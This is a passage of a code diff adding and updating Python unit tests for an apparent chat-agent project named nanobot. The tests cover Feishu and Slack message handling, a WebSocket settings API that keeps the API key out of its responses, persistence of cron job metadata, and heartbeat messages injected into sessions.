||||
metadata={
|
||||
"message_id": "om_child456",
|
||||
"chat_type": "group",
|
||||
"root_id": "om_root123",
|
||||
},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called_once()
|
||||
call_args = channel._client.im.v1.message.reply.call_args
|
||||
request = call_args[0][0]
|
||||
# Should reply to the inbound message_id, not the root
|
||||
assert request.message_id == "om_child456"
|
||||
assert request.request_body.reply_in_thread is True
|
||||
|
||||
|
||||
def test_on_reaction_added_stores_reaction_id() -> None:
|
||||
"""_on_reaction_added stores the returned reaction_id in _reaction_ids."""
|
||||
channel = _make_feishu_channel()
|
||||
loop = asyncio.new_event_loop()
|
||||
try:
|
||||
task = loop.create_task(asyncio.sleep(0, result="reaction_abc"))
|
||||
loop.run_until_complete(task)
|
||||
channel._on_reaction_added("om_001", task)
|
||||
finally:
|
||||
loop.close()
|
||||
|
||||
assert channel._reaction_ids["om_001"] == "reaction_abc"
|
||||
|
||||
|
||||
def test_on_reaction_added_skips_none_result() -> None:
|
||||
"""_on_reaction_added does not store None results."""
|
||||
channel = _make_feishu_channel()
|
||||
loop = asyncio.new_event_loop()
|
||||
try:
|
||||
task = loop.create_task(asyncio.sleep(0, result=None))
|
||||
loop.run_until_complete(task)
|
||||
channel._on_reaction_added("om_001", task)
|
||||
finally:
|
||||
loop.close()
|
||||
|
||||
assert "om_001" not in channel._reaction_ids
|
||||
|
||||
|
||||
def test_on_background_task_done_removes_from_set() -> None:
|
||||
"""_on_background_task_done removes task from tracking set."""
|
||||
channel = _make_feishu_channel()
|
||||
loop = asyncio.new_event_loop()
|
||||
try:
|
||||
async def _fail():
|
||||
raise RuntimeError("test failure")
|
||||
|
||||
task = loop.create_task(_fail())
|
||||
channel._background_tasks.add(task)
|
||||
try:
|
||||
loop.run_until_complete(task)
|
||||
except RuntimeError:
|
||||
pass # expected
|
||||
channel._on_background_task_done(task)
|
||||
finally:
|
||||
loop.close()
|
||||
|
||||
assert task not in channel._background_tasks
|
||||
|
||||
@ -1,5 +1,9 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock
|
||||
|
||||
import httpx
|
||||
import pytest
|
||||
|
||||
# Check optional Slack dependencies before running tests
|
||||
@ -10,7 +14,7 @@ except ImportError:
|
||||
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.channels.slack import SlackChannel, SlackConfig
|
||||
from nanobot.channels.slack import SLACK_MAX_MESSAGE_LEN, SlackChannel, SlackConfig
|
||||
|
||||
|
||||
class _FakeAsyncWebClient:
|
||||
@ -20,26 +24,30 @@ class _FakeAsyncWebClient:
|
||||
self.reactions_add_calls: list[dict[str, object | None]] = []
|
||||
self.reactions_remove_calls: list[dict[str, object | None]] = []
|
||||
self.conversations_list_calls: list[dict[str, object | None]] = []
|
||||
self.conversations_replies_calls: list[dict[str, object | None]] = []
|
||||
self.users_list_calls: list[dict[str, object | None]] = []
|
||||
self.conversations_open_calls: list[dict[str, object | None]] = []
|
||||
self._conversations_pages: list[dict[str, object]] = []
|
||||
self._conversations_replies_response: dict[str, object] = {"messages": []}
|
||||
self._users_pages: list[dict[str, object]] = []
|
||||
self._open_dm_response: dict[str, object] = {"channel": {"id": "D_OPENED"}}
|
||||
|
||||
async def chat_postMessage(
|
||||
async def chat_postMessage( # noqa: N802 - mirrors Slack SDK method name
|
||||
self,
|
||||
*,
|
||||
channel: str,
|
||||
text: str,
|
||||
thread_ts: str | None = None,
|
||||
blocks: list[dict[str, object]] | None = None,
|
||||
) -> None:
|
||||
self.chat_post_calls.append(
|
||||
{
|
||||
"channel": channel,
|
||||
"text": text,
|
||||
"thread_ts": thread_ts,
|
||||
}
|
||||
)
|
||||
call: dict[str, object | None] = {
|
||||
"channel": channel,
|
||||
"text": text,
|
||||
"thread_ts": thread_ts,
|
||||
}
|
||||
if blocks is not None:
|
||||
call["blocks"] = blocks
|
||||
self.chat_post_calls.append(call)
|
||||
|
||||
async def files_upload_v2(
|
||||
self,
|
||||
@ -92,6 +100,10 @@ class _FakeAsyncWebClient:
|
||||
return self._conversations_pages.pop(0)
|
||||
return {"channels": [], "response_metadata": {"next_cursor": ""}}
|
||||
|
||||
async def conversations_replies(self, **kwargs):
|
||||
self.conversations_replies_calls.append(kwargs)
|
||||
return self._conversations_replies_response
|
||||
|
||||
async def users_list(self, **kwargs):
|
||||
self.users_list_calls.append(kwargs)
|
||||
if self._users_pages:
|
||||
@ -149,6 +161,61 @@ async def test_send_omits_thread_for_dm_messages() -> None:
|
||||
assert fake_web.file_upload_calls[0]["thread_ts"] is None
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_splits_long_messages() -> None:
|
||||
channel = SlackChannel(SlackConfig(enabled=True), MessageBus())
|
||||
fake_web = _FakeAsyncWebClient()
|
||||
channel._web_client = fake_web
|
||||
|
||||
await channel.send(
|
||||
OutboundMessage(
|
||||
channel="slack",
|
||||
chat_id="C123",
|
||||
content="x" * (SLACK_MAX_MESSAGE_LEN + 10),
|
||||
)
|
||||
)
|
||||
|
||||
assert len(fake_web.chat_post_calls) == 2
|
||||
assert all(len(str(call["text"])) <= SLACK_MAX_MESSAGE_LEN for call in fake_web.chat_post_calls)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_renders_buttons_on_last_message_chunk() -> None:
|
||||
channel = SlackChannel(SlackConfig(enabled=True), MessageBus())
|
||||
fake_web = _FakeAsyncWebClient()
|
||||
channel._web_client = fake_web
|
||||
|
||||
await channel.send(
|
||||
OutboundMessage(
|
||||
channel="slack",
|
||||
chat_id="C123",
|
||||
content="Choose one",
|
||||
buttons=[["Yes", "No"]],
|
||||
)
|
||||
)
|
||||
|
||||
assert len(fake_web.chat_post_calls) == 1
|
||||
blocks = fake_web.chat_post_calls[0]["blocks"]
|
||||
assert isinstance(blocks, list)
|
||||
assert blocks[-1] == {
|
||||
"type": "actions",
|
||||
"elements": [
|
||||
{
|
||||
"type": "button",
|
||||
"text": {"type": "plain_text", "text": "Yes"},
|
||||
"value": "Yes",
|
||||
"action_id": "ask_user_Yes",
|
||||
},
|
||||
{
|
||||
"type": "button",
|
||||
"text": {"type": "plain_text", "text": "No"},
|
||||
"value": "No",
|
||||
"action_id": "ask_user_No",
|
||||
},
|
||||
],
|
||||
}
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_updates_reaction_when_final_response_sent() -> None:
|
||||
channel = SlackChannel(SlackConfig(enabled=True, react_emoji="eyes"), MessageBus())
|
||||
@ -316,3 +383,143 @@ async def test_send_raises_when_named_target_cannot_be_resolved() -> None:
|
||||
content="hello",
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_with_thread_context_fetches_root_once() -> None:
|
||||
channel = SlackChannel(SlackConfig(enabled=True), MessageBus())
|
||||
channel._bot_user_id = "UBOT"
|
||||
fake_web = _FakeAsyncWebClient()
|
||||
fake_web._conversations_replies_response = {
|
||||
"messages": [
|
||||
{"ts": "111.000", "user": "UROOT", "text": "drink water"},
|
||||
{"ts": "112.000", "user": "U2", "text": "good idea"},
|
||||
{"ts": "112.500", "user": "UBOT", "text": "I'll remind you."},
|
||||
{"ts": "113.000", "user": "U3", "text": "<@UBOT> what did you see?"},
|
||||
]
|
||||
}
|
||||
channel._web_client = fake_web
|
||||
|
||||
content = await channel._with_thread_context(
|
||||
"what did you see?",
|
||||
chat_id="C123",
|
||||
channel_type="channel",
|
||||
thread_ts="111.000",
|
||||
raw_thread_ts="111.000",
|
||||
current_ts="113.000",
|
||||
)
|
||||
|
||||
assert fake_web.conversations_replies_calls == [
|
||||
{"channel": "C123", "ts": "111.000", "limit": 20}
|
||||
]
|
||||
assert "Slack thread context before this mention:" in content
|
||||
assert "- <@UROOT>: drink water" in content
|
||||
assert "- <@U2>: good idea" in content
|
||||
assert "- bot: I'll remind you." in content
|
||||
assert "U3" not in content
|
||||
assert content.endswith("Current message:\nwhat did you see?")
|
||||
|
||||
second = await channel._with_thread_context(
|
||||
"again",
|
||||
chat_id="C123",
|
||||
channel_type="channel",
|
||||
thread_ts="111.000",
|
||||
raw_thread_ts="111.000",
|
||||
current_ts="114.000",
|
||||
)
|
||||
assert second == "again"
|
||||
assert len(fake_web.conversations_replies_calls) == 1
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_slack_slash_command_skips_thread_context() -> None:
|
||||
channel = SlackChannel(SlackConfig(enabled=True, allow_from=[]), MessageBus())
|
||||
channel._bot_user_id = "UBOT"
|
||||
channel._with_thread_context = AsyncMock(return_value="wrapped") # type: ignore[method-assign]
|
||||
channel._handle_message = AsyncMock() # type: ignore[method-assign]
|
||||
client = SimpleNamespace(send_socket_mode_response=AsyncMock())
|
||||
req = SimpleNamespace(
|
||||
type="events_api",
|
||||
envelope_id="env-1",
|
||||
payload={
|
||||
"event": {
|
||||
"type": "app_mention",
|
||||
"user": "U1",
|
||||
"channel": "C123",
|
||||
"text": "<@UBOT> /restart",
|
||||
"thread_ts": "111.000",
|
||||
"ts": "112.000",
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
await channel._on_socket_request(client, req)
|
||||
|
||||
channel._with_thread_context.assert_not_awaited()
|
||||
channel._handle_message.assert_awaited_once()
|
||||
assert channel._handle_message.await_args.kwargs["content"] == "/restart"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_slack_file_share_downloads_media_and_reaches_agent() -> None:
|
||||
channel = SlackChannel(SlackConfig(enabled=True, bot_token="xoxb-test"), MessageBus())
|
||||
channel._bot_user_id = "UBOT"
|
||||
channel._web_client = _FakeAsyncWebClient()
|
||||
channel._handle_message = AsyncMock() # type: ignore[method-assign]
|
||||
channel._download_slack_file = AsyncMock( # type: ignore[method-assign]
|
||||
return_value=("/tmp/report.pdf", "[file: report.pdf]")
|
||||
)
|
||||
client = SimpleNamespace(send_socket_mode_response=AsyncMock())
|
||||
req = SimpleNamespace(
|
||||
type="events_api",
|
||||
envelope_id="env-file",
|
||||
payload={
|
||||
"event": {
|
||||
"type": "message",
|
||||
"subtype": "file_share",
|
||||
"user": "U1",
|
||||
"channel": "D123",
|
||||
"channel_type": "im",
|
||||
"text": "please read this",
|
||||
"ts": "1700000000.000100",
|
||||
"files": [
|
||||
{
|
||||
"id": "F123",
|
||||
"name": "report.pdf",
|
||||
"mimetype": "application/pdf",
|
||||
"url_private_download": "https://files.slack.com/report.pdf",
|
||||
}
|
||||
],
|
||||
}
|
||||
},
|
||||
)
|
||||
|
||||
await channel._on_socket_request(client, req)
|
||||
|
||||
channel._download_slack_file.assert_awaited_once()
|
||||
channel._handle_message.assert_awaited_once()
|
||||
kwargs = channel._handle_message.await_args.kwargs
|
||||
assert kwargs["content"] == "please read this\n[file: report.pdf]"
|
||||
assert kwargs["media"] == ["/tmp/report.pdf"]
|
||||
|
||||
|
||||
def test_slack_download_rejects_login_html() -> None:
|
||||
html_response = httpx.Response(
|
||||
200,
|
||||
headers={"content-type": "text/html; charset=utf-8"},
|
||||
content=b"<!doctype html><html><title>Sign in to Slack</title>",
|
||||
)
|
||||
markdown_response = httpx.Response(
|
||||
200,
|
||||
headers={"content-type": "text/markdown"},
|
||||
content=b"# PR Extraction Guide\n",
|
||||
)
|
||||
|
||||
assert SlackChannel._looks_like_html_download(html_response) is True
|
||||
assert SlackChannel._looks_like_html_download(markdown_response) is False
|
||||
|
||||
|
||||
def test_slack_channel_uses_channel_aware_allow_policy() -> None:
|
||||
channel = SlackChannel(SlackConfig(enabled=True, allow_from=[]), MessageBus())
|
||||
assert channel.is_allowed("U1") is True
|
||||
assert channel._is_allowed("U1", "C123", "channel") is True
|
||||
|
||||
@ -26,6 +26,8 @@ from nanobot.channels.websocket import (
|
||||
_parse_query,
|
||||
_parse_request_path,
|
||||
)
|
||||
from nanobot.config.loader import load_config, save_config
|
||||
from nanobot.config.schema import Config
|
||||
|
||||
# -- Shared helpers (aligned with test_websocket_integration.py) ---------------
|
||||
|
||||
@ -178,6 +180,7 @@ async def test_send_delivers_json_message_with_media_and_reply() -> None:
|
||||
content="hello",
|
||||
reply_to="m1",
|
||||
media=["/tmp/a.png"],
|
||||
buttons=[["Yes", "No"]],
|
||||
)
|
||||
await channel.send(msg)
|
||||
|
||||
@ -185,9 +188,11 @@ async def test_send_delivers_json_message_with_media_and_reply() -> None:
|
||||
payload = json.loads(mock_ws.send.call_args[0][0])
|
||||
assert payload["event"] == "message"
|
||||
assert payload["chat_id"] == "chat-1"
|
||||
assert payload["text"] == "hello"
|
||||
assert payload["text"] == "hello\n\n1. Yes\n2. No"
|
||||
assert payload["button_prompt"] == "hello"
|
||||
assert payload["reply_to"] == "m1"
|
||||
assert payload["media"] == ["/tmp/a.png"]
|
||||
assert payload["buttons"] == [["Yes", "No"]]
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@ -436,6 +441,72 @@ async def test_http_route_issues_token_then_websocket_requires_it(bus: MagicMock
|
||||
await server_task
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_settings_api_returns_safe_subset_and_updates_whitelist(
|
||||
bus: MagicMock,
|
||||
monkeypatch,
|
||||
tmp_path,
|
||||
) -> None:
|
||||
port = 29891
|
||||
config_path = tmp_path / "config.json"
|
||||
config = Config()
|
||||
config.agents.defaults.model = "openai/gpt-4o"
|
||||
config.providers.openai.api_key = "secret-key"
|
||||
save_config(config, config_path)
|
||||
monkeypatch.setattr("nanobot.config.loader._current_config_path", config_path)
|
||||
|
||||
channel = _ch(bus, port=port)
|
||||
channel._api_tokens["tok"] = time.monotonic() + 300
|
||||
|
||||
server_task = asyncio.create_task(channel.start())
|
||||
await asyncio.sleep(0.3)
|
||||
|
||||
try:
|
||||
settings = await _http_get(
|
||||
f"http://127.0.0.1:{port}/api/settings",
|
||||
headers={"Authorization": "Bearer tok"},
|
||||
)
|
||||
assert settings.status_code == 200
|
||||
body = settings.json()
|
||||
assert body["agent"]["model"] == "openai/gpt-4o"
|
||||
assert body["agent"]["provider"] == "openai"
|
||||
assert {"name": "auto", "label": "Auto"} in body["providers"]
|
||||
assert body["agent"]["has_api_key"] is True
|
||||
assert "secret-key" not in settings.text
|
||||
|
||||
updated = await _http_get(
|
||||
"http://127.0.0.1:"
|
||||
f"{port}/api/settings/update?model=openrouter/test"
|
||||
"&provider=openrouter",
|
||||
headers={"Authorization": "Bearer tok"},
|
||||
)
|
||||
assert updated.status_code == 200
|
||||
assert updated.json()["requires_restart"] is True
|
||||
|
||||
saved = load_config(config_path)
|
||||
assert saved.agents.defaults.model == "openrouter/test"
|
||||
assert saved.agents.defaults.provider == "openrouter"
|
||||
finally:
|
||||
await channel.stop()
|
||||
await server_task
|
||||
|
||||
|
||||
def test_settings_payload_normalizes_camel_case_provider(
|
||||
bus: MagicMock,
|
||||
monkeypatch,
|
||||
tmp_path,
|
||||
) -> None:
|
||||
config_path = tmp_path / "config.json"
|
||||
config = Config()
|
||||
config.agents.defaults.provider = "minimaxAnthropic"
|
||||
save_config(config, config_path)
|
||||
monkeypatch.setattr("nanobot.config.loader._current_config_path", config_path)
|
||||
|
||||
body = _ch(bus)._settings_payload()
|
||||
|
||||
assert body["agent"]["provider"] == "minimax_anthropic"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_end_to_end_server_pushes_streaming_deltas_to_client(bus: MagicMock) -> None:
|
||||
port = 29880
|
||||
|
||||
@ -12,6 +12,7 @@ from nanobot.bus.events import OutboundMessage
|
||||
from nanobot.cli.commands import _make_provider, app
|
||||
from nanobot.config.schema import Config
|
||||
from nanobot.cron.types import CronJob, CronPayload
|
||||
from nanobot.providers.factory import ProviderSnapshot
|
||||
from nanobot.providers.openai_codex_provider import _strip_model_prefix
|
||||
from nanobot.providers.registry import find_by_name
|
||||
|
||||
@ -776,6 +777,15 @@ def _stop_gateway_provider(_config) -> object:
|
||||
raise _StopGatewayError("stop")
|
||||
|
||||
|
||||
def _test_provider_snapshot(provider: object, config: Config) -> ProviderSnapshot:
|
||||
return ProviderSnapshot(
|
||||
provider=provider,
|
||||
model=config.agents.defaults.model,
|
||||
context_window_tokens=config.agents.defaults.context_window_tokens,
|
||||
signature=("test",),
|
||||
)
|
||||
|
||||
|
||||
def _patch_cli_command_runtime(
|
||||
monkeypatch,
|
||||
config: Config,
|
||||
@ -788,6 +798,8 @@ def _patch_cli_command_runtime(
|
||||
cron_service=None,
|
||||
get_cron_dir=None,
|
||||
) -> None:
|
||||
provider_factory = make_provider or (lambda _config: object())
|
||||
|
||||
monkeypatch.setattr(
|
||||
"nanobot.config.loader.set_config_path",
|
||||
set_config_path or (lambda _path: None),
|
||||
@ -800,7 +812,15 @@ def _patch_cli_command_runtime(
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.cli.commands._make_provider",
|
||||
make_provider or (lambda _config: object()),
|
||||
provider_factory,
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.providers.factory.build_provider_snapshot",
|
||||
lambda _config: _test_provider_snapshot(provider_factory(_config), _config),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.providers.factory.load_provider_snapshot",
|
||||
lambda _config_path=None: _test_provider_snapshot(provider_factory(config), config),
|
||||
)
|
||||
|
||||
if message_bus is not None:
|
||||
@ -941,8 +961,36 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
|
||||
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
|
||||
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
|
||||
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: provider)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.providers.factory.build_provider_snapshot",
|
||||
lambda _config: _test_provider_snapshot(provider, _config),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.providers.factory.load_provider_snapshot",
|
||||
lambda _config_path=None: _test_provider_snapshot(provider, config),
|
||||
)
|
||||
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
|
||||
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())
|
||||
|
||||
class _FakeSession:
|
||||
def __init__(self) -> None:
|
||||
self.messages = []
|
||||
|
||||
def add_message(self, role: str, content: str, **kwargs) -> None:
|
||||
self.messages.append({"role": role, "content": content, **kwargs})
|
||||
|
||||
class _FakeSessionManager:
|
||||
def __init__(self, _workspace: Path) -> None:
|
||||
self.session = _FakeSession()
|
||||
seen["session_manager"] = self
|
||||
|
||||
def get_or_create(self, key: str) -> _FakeSession:
|
||||
seen["session_key"] = key
|
||||
return self.session
|
||||
|
||||
def save(self, session: _FakeSession) -> None:
|
||||
seen["saved_session"] = session
|
||||
|
||||
monkeypatch.setattr("nanobot.session.manager.SessionManager", _FakeSessionManager)
|
||||
|
||||
class _FakeCron:
|
||||
def __init__(self, _store_path: Path) -> None:
|
||||
@ -1019,9 +1067,11 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
|
||||
assert seen["provider"] is provider
|
||||
assert seen["model"] == "test-model"
|
||||
assert seen["task_context"] == (
|
||||
"[Scheduled Task] Timer finished.\n\n"
|
||||
"Task 'stretch' has been triggered.\n"
|
||||
"Scheduled instruction: Remind me to stretch."
|
||||
"The scheduled time has arrived. Deliver this reminder to the user now, "
|
||||
"as a brief and natural message in their language. Speak directly to them — "
|
||||
"do not narrate progress, summarize, include user IDs, or add status reports "
|
||||
"like 'Done' or 'Reminded'.\n\n"
|
||||
"Reminder: Remind me to stretch."
|
||||
)
|
||||
bus.publish_outbound.assert_awaited_once_with(
|
||||
OutboundMessage(
|
||||
@ -1030,6 +1080,16 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
|
||||
content="Time to stretch.",
|
||||
)
|
||||
)
|
||||
assert seen["session_key"] == "telegram:user-1"
|
||||
saved_session = seen["saved_session"]
|
||||
assert isinstance(saved_session, _FakeSession)
|
||||
assert saved_session.messages == [
|
||||
{
|
||||
"role": "assistant",
|
||||
"content": "Time to stretch.",
|
||||
"_channel_delivery": True,
|
||||
}
|
||||
]
|
||||
|
||||
|
||||
def test_gateway_cron_job_suppresses_intermediate_progress(
|
||||
@ -1052,6 +1112,14 @@ def test_gateway_cron_job_suppresses_intermediate_progress(
|
||||
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
|
||||
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
|
||||
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: object())
|
||||
monkeypatch.setattr(
|
||||
"nanobot.providers.factory.build_provider_snapshot",
|
||||
lambda _config: _test_provider_snapshot(object(), _config),
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
"nanobot.providers.factory.load_provider_snapshot",
|
||||
lambda _config_path=None: _test_provider_snapshot(object(), config),
|
||||
)
|
||||
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
|
||||
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())
|
||||
|
||||
|
||||
@ -43,6 +43,59 @@ def test_add_job_accepts_valid_timezone(tmp_path) -> None:
|
||||
assert job.state.next_run_at_ms is not None
|
||||
|
||||
|
||||
def test_add_job_preserves_channel_meta_and_session_key(tmp_path) -> None:
|
||||
service = CronService(tmp_path / "cron" / "jobs.json")
|
||||
meta = {"slack": {"thread_ts": "1234567890.123456", "channel_type": "channel"}}
|
||||
job = service.add_job(
|
||||
name="thread test",
|
||||
schedule=CronSchedule(kind="every", every_ms=60_000),
|
||||
message="hello",
|
||||
deliver=True,
|
||||
channel="slack",
|
||||
to="C123",
|
||||
channel_meta=meta,
|
||||
session_key="slack:C123:1234567890.123456",
|
||||
)
|
||||
assert job.payload.channel_meta == meta
|
||||
assert job.payload.session_key == "slack:C123:1234567890.123456"
|
||||
|
||||
reloaded = service.get_job(job.id)
|
||||
assert reloaded is not None
|
||||
assert reloaded.payload.channel_meta == meta
|
||||
assert reloaded.payload.session_key == "slack:C123:1234567890.123456"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_channel_meta_and_session_key_survive_store_reload(tmp_path) -> None:
|
||||
store_path = tmp_path / "cron" / "jobs.json"
|
||||
service = CronService(store_path)
|
||||
await service.start()
|
||||
meta = {"slack": {"thread_ts": "1234567890.123456", "channel_type": "channel"}}
|
||||
try:
|
||||
job = service.add_job(
|
||||
name="thread test",
|
||||
schedule=CronSchedule(kind="every", every_ms=60_000),
|
||||
message="hello",
|
||||
deliver=True,
|
||||
channel="slack",
|
||||
to="C123",
|
||||
channel_meta=meta,
|
||||
session_key="slack:C123:1234567890.123456",
|
||||
)
|
||||
finally:
|
||||
service.stop()
|
||||
|
||||
raw = json.loads(store_path.read_text(encoding="utf-8"))
|
||||
payload = raw["jobs"][0]["payload"]
|
||||
assert payload["channelMeta"] == meta
|
||||
assert payload["sessionKey"] == "slack:C123:1234567890.123456"
|
||||
|
||||
reloaded = CronService(store_path).get_job(job.id)
|
||||
assert reloaded is not None
|
||||
assert reloaded.payload.channel_meta == meta
|
||||
assert reloaded.payload.session_key == "slack:C123:1234567890.123456"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_execute_job_records_run_history(tmp_path) -> None:
|
||||
store_path = tmp_path / "cron" / "jobs.json"
|
||||
|
||||
@ -382,6 +382,21 @@ def test_add_job_empty_message_returns_actionable_error(tmp_path) -> None:
|
||||
assert "Retry including message=" in result
|
||||
|
||||
|
||||
def test_add_job_captures_metadata_and_session_key(tmp_path) -> None:
|
||||
"""CronTool stores channel metadata and session_key when adding a job."""
|
||||
tool = _make_tool(tmp_path)
|
||||
meta = {"slack": {"thread_ts": "111.222", "channel_type": "channel"}}
|
||||
tool.set_context("slack", "C99", metadata=meta, session_key="slack:C99:111.222")
|
||||
|
||||
result = tool._add_job("test", "say hi", 60, None, None, None)
|
||||
assert "Created job" in result
|
||||
|
||||
jobs = tool._cron.list_jobs()
|
||||
assert len(jobs) == 1
|
||||
assert jobs[0].payload.channel_meta == meta
|
||||
assert jobs[0].payload.session_key == "slack:C99:111.222"
|
||||
|
||||
|
||||
def test_list_excludes_disabled_jobs(tmp_path) -> None:
|
||||
tool = _make_tool(tmp_path)
|
||||
job = tool._cron.add_job(
|
||||
|
||||
120
tests/heartbeat/test_heartbeat_context_bridge.py
Normal file
120
tests/heartbeat/test_heartbeat_context_bridge.py
Normal file
@ -0,0 +1,120 @@
|
||||
"""Tests for heartbeat context bridge — injecting delivered messages into channel session."""
|
||||
|
||||
from nanobot.session.manager import SessionManager
|
||||
|
||||
|
||||
class TestHeartbeatContextBridge:
|
||||
"""Verify that on_heartbeat_notify injects the assistant message into the
|
||||
channel session so user replies have conversational context."""
|
||||
|
||||
def test_notify_injects_into_channel_session(self, tmp_path):
|
||||
"""After notify, the target channel session should contain the
|
||||
heartbeat response as an assistant turn."""
|
||||
session_mgr = SessionManager(tmp_path / "sessions")
|
||||
target_key = "telegram:12345"
|
||||
|
||||
# Simulate: session exists with one user message
|
||||
target_session = session_mgr.get_or_create(target_key)
|
||||
target_session.add_message("user", "hello earlier")
|
||||
session_mgr.save(target_session)
|
||||
|
||||
# Simulate what on_heartbeat_notify does
|
||||
target_session = session_mgr.get_or_create(target_key)
|
||||
target_session.add_message(
|
||||
"assistant",
|
||||
"3 new emails — invoice, meeting, proposal.",
|
||||
_channel_delivery=True,
|
||||
)
|
||||
session_mgr.save(target_session)
|
||||
|
||||
# Reload and verify
|
||||
reloaded = session_mgr.get_or_create(target_key)
|
||||
messages = reloaded.get_history(max_messages=0)
|
||||
roles = [m["role"] for m in messages]
|
||||
assert roles == ["user", "assistant"]
|
||||
assert "3 new emails" in messages[-1]["content"]
|
||||
|
||||
def test_reply_after_injection_has_context(self, tmp_path):
|
||||
"""Simulates the full flow: prior conversation exists, heartbeat
|
||||
injects, then user replies. The session should have the heartbeat
|
||||
message visible in get_history so the model sees the context."""
|
||||
session_mgr = SessionManager(tmp_path / "sessions")
|
||||
target_key = "telegram:12345"
|
||||
|
||||
# Pre-existing conversation (user has chatted before)
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message("user", "Hey")
|
||||
session.add_message("assistant", "Hi there!")
|
||||
session_mgr.save(session)
|
||||
|
||||
# Step 1: heartbeat injects assistant message
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message(
|
||||
"assistant",
|
||||
"If you want, I can mark that email as read.",
|
||||
_channel_delivery=True,
|
||||
)
|
||||
session_mgr.save(session)
|
||||
|
||||
# Step 2: user replies "Sure"
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message("user", "Sure")
|
||||
session_mgr.save(session)
|
||||
|
||||
# Verify: get_history includes the heartbeat injection
|
||||
reloaded = session_mgr.get_or_create(target_key)
|
||||
history = reloaded.get_history(max_messages=0)
|
||||
roles = [m["role"] for m in history]
|
||||
assert roles == ["user", "assistant", "assistant", "user"]
|
||||
assert "mark that email" in history[2]["content"]
|
||||
assert history[3]["content"] == "Sure"
|
||||
|
||||
def test_injection_does_not_duplicate_on_existing_history(self, tmp_path):
|
||||
"""If the channel session already has messages, the injection
|
||||
appends cleanly without corruption."""
|
||||
session_mgr = SessionManager(tmp_path / "sessions")
|
||||
target_key = "telegram:12345"
|
||||
|
||||
# Pre-existing conversation
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message("user", "What time is it?")
|
||||
session.add_message("assistant", "It's 2pm.")
|
||||
session.add_message("user", "Thanks")
|
||||
session_mgr.save(session)
|
||||
|
||||
# Heartbeat injects
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message(
|
||||
"assistant",
|
||||
"You have a meeting in 30 minutes.",
|
||||
_channel_delivery=True,
|
||||
)
|
||||
session_mgr.save(session)
|
||||
|
||||
# Verify
|
||||
reloaded = session_mgr.get_or_create(target_key)
|
||||
history = reloaded.get_history(max_messages=0)
|
||||
roles = [m["role"] for m in history]
|
||||
assert roles == ["user", "assistant", "user", "assistant"]
|
||||
assert "meeting in 30 minutes" in history[-1]["content"]
|
||||
|
||||
def test_reply_after_injection_to_empty_session_keeps_context(self, tmp_path):
|
||||
"""A user replying to the first delivered message still sees that context."""
|
||||
session_mgr = SessionManager(tmp_path / "sessions")
|
||||
target_key = "telegram:99999"
|
||||
|
||||
session = session_mgr.get_or_create(target_key)
|
||||
session.add_message(
|
||||
"assistant",
|
||||
"Weather alert: sandstorm expected at 4pm.",
|
||||
_channel_delivery=True,
|
||||
)
|
||||
session.add_message("user", "Sure")
|
||||
session_mgr.save(session)
|
||||
|
||||
reloaded = session_mgr.get_or_create(target_key)
|
||||
history = reloaded.get_history(max_messages=0)
|
||||
assert len(history) == 2
|
||||
assert history[0]["role"] == "assistant"
|
||||
assert "sandstorm" in history[0]["content"]
|
||||
assert history[1] == {"role": "user", "content": "Sure"}
|
||||
@ -585,6 +585,81 @@ def test_openai_compat_preserves_message_level_reasoning_fields() -> None:
|
||||
assert sanitized[1]["tool_calls"][0]["extra_content"] == {"google": {"thought_signature": "sig"}}
|
||||
|
||||
|
||||
def _deepseek_kwargs(messages: list[dict]) -> dict:
|
||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||
provider = OpenAICompatProvider(
|
||||
api_key="sk-test",
|
||||
default_model="deepseek-v4-flash",
|
||||
spec=find_by_name("deepseek"),
|
||||
)
|
||||
|
||||
return provider._build_kwargs(
|
||||
messages=messages,
|
||||
tools=None,
|
||||
model="deepseek-v4-flash",
|
||||
max_tokens=1024,
|
||||
temperature=0.7,
|
